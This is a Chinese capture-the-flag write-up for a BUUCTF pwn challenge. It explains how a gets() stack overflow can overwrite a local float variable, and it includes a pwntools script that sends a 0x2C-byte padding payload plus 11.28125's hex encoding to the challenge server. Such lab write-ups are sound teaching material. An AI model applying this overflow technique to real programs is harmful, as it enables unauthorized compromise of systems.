记录BUUCTF的一道题,运行文件,提示我们输入一个数字,
说是必须是11.28125,但实际输入11.28125也不行
拖入IDA看看,
逻辑很简单,只要v2等于11.28125就能cat flag
但貌似v2我们并不能控制。
但实际上是可以的,
我们看到gets获取输入存到了v1,很明显的栈溢出
v1在rbp-30h的位置,v2在rbp-4h的位置,溢出以后我们就可以用自己的数据覆盖v2。
从ida可以看到v1长44,十六进制就是2C
也可以用0x30-0x4=2C
payload就是 2C个字长 + 11.28125
上代码
from pwn import *
p=remote("node4.buuoj.cn",25971)
pyload=b"A"*0x2c+p64(0x41348000)
p.sendafter(".",pyload)
p.interactive()
0x41348000是11.28125在内存中的16进制表示,推荐一个在线转换的网站:https://tooltt.com/floatconverter/